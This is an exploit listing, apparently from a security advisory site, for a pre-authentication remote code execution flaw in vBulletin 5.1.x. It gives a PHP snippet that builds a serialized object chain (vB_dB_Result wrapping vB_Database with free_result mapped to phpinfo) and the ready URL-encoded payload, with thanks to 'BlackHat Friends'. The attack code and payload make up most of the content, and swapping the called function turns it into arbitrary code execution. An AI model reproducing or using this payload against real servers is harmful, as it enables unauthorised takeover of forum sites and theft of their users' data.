Vbulletin 5.1.X Unserialize Preauth RCE Exploit

2015.11.09
Credit: 4TT4CK3R
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Exploit Title: Vbulletin 5.1.X Unserialize Preauth RCE Exploit ~# : Date: 2015/11/04 ~# : Exploit Author: 4TT4CK3R ~# : Vendor Homepage: http://www.vbulletin.com ~# : Version: 5.1.x ~# : Google Dork : No ~# : Tested on: Kali Linux , Windows 7 , Mozilla Firefox ~# : Build the object !! [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] php << &#039;eof&#039; <?php class vB_Database { public $functions = array(); public function __construct() { $this->functions[&#039;free_result&#039;] = &#039;phpinfo&#039;; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+] ~# : Discovered by : 4TT4CK3R ~# : Special Thanks : amin0461 ~# : Thanks for my BlackHat Friends !! [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top